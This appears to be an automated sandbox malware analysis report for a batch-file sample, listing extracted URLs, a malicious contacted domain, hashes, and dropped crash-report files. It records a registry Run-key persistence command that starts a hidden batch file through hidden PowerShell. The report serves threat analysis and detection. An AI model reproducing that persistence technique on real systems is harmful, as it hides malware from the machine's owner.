https://contoso.com/Icon	powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.10.dr	false	URL Reputation: safe	unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq	Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr	false		unknown
https://aka.ms/pscore6	powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.7.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	svchost.exe, 00000032.00000002.3031906020.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000023.00000002.2477927278.000002A7E279D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3079927018.000001D559774000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2549732698.000001D559773000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.2564164365.000001D559773000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://aka.ms/pscore6xGa	powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2385169405.000001A6A96E0000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2678729397.000002A7F25DD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://Passport.NET/tb	Microsoft-Windows-LiveId%4Operational.evtx.49.dr	false	0%, Virustotal, Browse	unknown
https://aka.ms/pscore68	powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000027.00000002.3016592946.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475206356.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000027.00000002.3015267730.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475151246.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2143782680.000001A699651000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3057806041.0000016A83EE1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2477927278.000002A7E2571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.64.119.55	azure-winsecure.com	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525388
Start date and time:	2024-10-04 05:22:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	20
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1.cmd
Detection:	MAL
Classification:	mal100.spyw.evad.winCMD@55/94@1/1
EGA Information:	Successful, ratio: 91.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 66 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 104.208.16.94, 20.42.65.92, 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:24:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
04:24:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
23:23:22	API Interceptor	4x Sleep call for process: WMIC.exe modified
23:23:25	API Interceptor	29068x Sleep call for process: powershell.exe modified
23:23:50	API Interceptor	2x Sleep call for process: WerFault.exe modified
23:25:09	API Interceptor	232x Sleep call for process: winlogon.exe modified
23:25:10	API Interceptor	217x Sleep call for process: lsass.exe modified
23:25:11	API Interceptor	1656x Sleep call for process: svchost.exe modified
23:25:12	API Interceptor	183x Sleep call for process: dwm.exe modified
23:25:24	API Interceptor	14x Sleep call for process: cmd.exe modified
23:25:24	API Interceptor	12x Sleep call for process: WMIADAP.exe modified
23:25:24	API Interceptor	27x Sleep call for process: conhost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
azure-winsecure.com	1 (2).cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	rbx-CO2.bat	Get hash	malicious	Unknown	Browse	154.216.20.132
	SC.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	1.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	2.cmd	Get hash	malicious	Unknown	Browse	154.216.20.132
	download_2.exe	Get hash	malicious	Quasar	Browse	154.216.20.132

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	https://livelovelead.coach/wp-admin/readme.html	Get hash	malicious	Phisher	Browse	162.0.235.3
	hH4dbIGfGT.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	DHL_ 46773482.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	Fvqw64NU4k.exe	Get hash	malicious	FormBook	Browse	162.0.236.169
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	198.54.122.135
	PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	162.213.249.216
	payment copy.exe	Get hash	malicious	FormBook	Browse	162.0.238.238
	ELECTRONIC RECEIPT_Opcsa.html	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	199.188.203.125

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_417091be-de45-467f-8e85-c1d043a96f39\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5088944585074444
Encrypted:	false
SSDEEP:	192:Gmn4mGIy9d0eLDkja1TyDRhl42lg6zuiF7Z24lO8n:5HGIykeLDkjOTkj4Ug6zuiF7Y4lO8n
MD5:	4B129C40B1D4EA03BBBBCEA8093FC7E4
SHA1:	5AFB28CE243D01688349DF2630A2B41E75A7B387
SHA-256:	10E4CB6E2BD88E4585C372CB196B39C09D59EB4D17E123CB31B820ABA7205523
SHA-512:	728B07B39CDF5B26B06980ED53F2DB8E0FAF0EB018D1C08AA8A54B0A1252096E82D64A93711EE6D4F7E15030800E36849082CF3F871D47AD42077E93916B1F1E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.8.5.8.6.7.6.4.2.6.7.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.8.5.8.6.8.8.6.1.4.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.7.0.9.1.b.e.-.d.e.4.5.-.4.6.7.f.-.8.e.8.5.-.c.1.d.0.4.3.a.9.6.f.3.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.f.a.4.6.7.4.-.e.1.6.f.-.4.6.2.6.-.8.8.7.f.-.3.8.e.e.8.1.b.2.1.e.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.f.8.-.0.0.0.1.-.0.0.1.4.-.b.6.9.3.-.f.e.e.7.0.c.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_dc34baa62d94b1453e37c8fdf4c57a0ef7376b6_e3b0f337_89cc5d61-6f0a-4952-9c41-c653d503300c\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5091868889249822
Encrypted:	false
SSDEEP:	192:fVWmG66y9d0eLDkjaVTyJN5Wl4lg6zuiFgZ24lO8n:9ZGHykeLDkj+T+5gqg6zuiFgY4lO8n
MD5:	641990F22296FBB879F00938A9A431A3
SHA1:	955640A65BC6FCF17D49986AF99A20F1C5FBEE50
SHA-256:	1ADFDA8B9D6EA5F21C262BD420D7C720D682BCB6ECD3562E7E2544803D6DB7DD
SHA-512:	F3552EDD79C4D5C38BF3165668F2026E6DE1711DD5AE4DF67A1F00AC51EA38379E66F317C36971970F85C397AFB5326DD5A40DC636FFEFDB0DC69AB8E8980B92
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.8.5.8.1.1.1.1.4.5.1.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.8.5.8.1.2.2.8.6.3.9.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.c.c.5.d.6.1.-.6.f.0.a.-.4.9.5.2.-.9.c.4.1.-.c.6.5.3.d.5.0.3.3.0.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.3.3.0.c.b.9.-.8.3.9.0.-.4.5.b.3.-.8.5.2.9.-.4.8.7.3.f.f.6.a.4.f.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.0.c.-.0.0.0.1.-.0.0.1.4.-.3.6.4.f.-.7.3.c.5.0.c.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER643A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 4 03:24:28 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	909890
Entropy (8bit):	3.517845911206375
Encrypted:	false
SSDEEP:	12288:lcqrlDQvevY46TqFhMaNB+BzLeLB3bqb:xQvs6WhMaGMLB3bq
MD5:	CAD70CBC42DCF59BB5437699E4EA6B74
SHA1:	B13B3CDFC964BB16B3793A655164077532B6A930
SHA-256:	D35B8E89DD80138296EFDA4DFA8A683310AE9C8DEF190AF7E9367532682AC97E
SHA-512:	BD6D18CA29CE6BCAA7D45ECA55123B16A0975D6D06E1540DE94E1B9245DFFBFF99A0F8FD9B48C8A7B9FACA6D5744E1D74FA97900B6F1935C2E35F3587A0AF927
Malicious:	false
Preview:	MDMP..a..... ........_.f............$............'..8........;...2......................`.......8...........T............_..2............m...........o..............................................................................eJ......\|p......Lw......................T............_.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6804.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8584
Entropy (8bit):	3.6944033848594815
Encrypted:	false
SSDEEP:	192:R6l7wVeJ9TX56YUasjjgmfZaPnpWEQx89bkgxfMsm:R6lXJpJ6YCjjgmfQPlkWfO
MD5:	BA70C3BF8E79B17B2252ED6F78723D8D
SHA1:	8767EBB1DC398B37E046080556B6C07EE7755044
SHA-256:	7472AB4AEF2DFF6D5D6A5FAA8C020D13DA889C68A31377612270D8BE39A23388
SHA-512:	A11AEC6F05E7F6C042CFC849CE30E83E46F24C56EDA421911F6FFF1AC2BA824BA1F14AC7AF50EA86E8C55D48B8F8BD7957284CE4262B4EAFE0F3FE1109969CEE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6863.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.440329921708468
Encrypted:	false
SSDEEP:	48:cvIwWl8zs/Jg771I96FWpW8VY2Ym8M4JQ9wSF/2yq8vlwfytfYd:uIjfhI7V07VGJQG+2WufufYd
MD5:	B06B5B1FF22009D9A2E055D55DDABA07
SHA1:	4827CB178DF146032C57F7ABBCFDE7628FDC48CC
SHA-256:	073FD6124D1D9915ADEE8DF5CA4CD2E05D12AEE98AA70FEDD0DB061AA083D632
SHA-512:	C470DCB32F22A756503164B3ADA1F8000C684E6B1BD5326B8BECAA9AE6F358852D83A2541F2EA4067A7ABFCAE18CBC4C4C194C0D04F8F2F9C06F6C9E4FE6DA6B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8767.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 4 03:23:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	914776
Entropy (8bit):	3.508573124268161
Encrypted:	false
SSDEEP:	6144:2vc/XmiysS+J13QBnqKVoLcY4R0HyNh3/lgpxpBBPGi6u1QI3g0qLap:9mNKZQAKVoPTkh3/lgpnrPGu3nqL+
MD5:	CBD272029E25C46A895643DF3FED30AA
SHA1:	6F3A00EDEF64FF1220FF1B26051BF45E5E982777
SHA-256:	D3AF1ED3EAEE128E78FA5C1F166A2AC61861DEB896D9284A9E5F9F1846A5171F
SHA-512:	A0EB74BB30C3C72D369AF0AC172DF3B3159AD29A25A5CF6A0C6350C4A3A63860ABC43AA35098755CF058FB809A55251E7F68C6B95743098A04FD73741595E4D7
Malicious:	false
Preview:	MDMP..a..... ........_.f............$............'..8....... ;...2......................`.......8...........T............_..H............n...........o..............................................................................eJ.......p......Lw......................T............_.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B21.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8780
Entropy (8bit):	3.697894708714123
Encrypted:	false
SSDEEP:	192:R6l7wVeJcZ+66Y3Dn4gmfZaPnpWEz89bo+vfh4m:R6lXJq+66Yzn4gmfQPqoefL
MD5:	968A022836E57DA5230F369012C87D1C
SHA1:	8CE15C8A9AAD470A7AC16A6D82556CA318A6BAE6
SHA-256:	5A30CB1D6E359E4C167DCCF77452D962D0CA10C0DAEEB95CF02E35AC1774CA5E
SHA-512:	FE391772BE6AFD9D70A440BC552618116D097AD470D2DE75A24A954F557E16343836DC37EE0E64B036FF0CC2F957B934D38E95EE88B969EEA68A60F7233C542C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B41.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.441666974880315
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg771I96FWpW8VYFmYm8M4JQ9wSFXWHyq8vlwHytfBd:uIjfWI7V07V8JQG5HWuHufBd
MD5:	73DA5398E8C8CCC2C3E3651897266496
SHA1:	359C8DD638745DB982DEC8C0122AE6208C3A1006
SHA-256:	3774AE9FC907E605D277FD01BC8F8E00CD2F10ADE5ED22E530D041627989EBE4
SHA-512:	35FCAA767D1B8D321C4191391D0EC526FB7F7E00B8FC43B46DD83315B6AA59C1D22D72AC838BCDF81C51804486AE9B35E127DB7FB36731B71CB83B11D7C873C3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528146" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2916
Entropy (8bit):	5.397135114946659
Encrypted:	false
SSDEEP:	48:4/AzsSU4Yymda+m9qr9tz4RIoUQ/78NfpHARDGx3axIZVE4buNHJBVrHLjtoB:EAzlHYvU9qrfIfl7KfpljPEo2drM
MD5:	0DA6270066A7BFE90CF0C7F108FDA3B5
SHA1:	B1B4653E77B56E94AB4548114D30E8F9C090F892
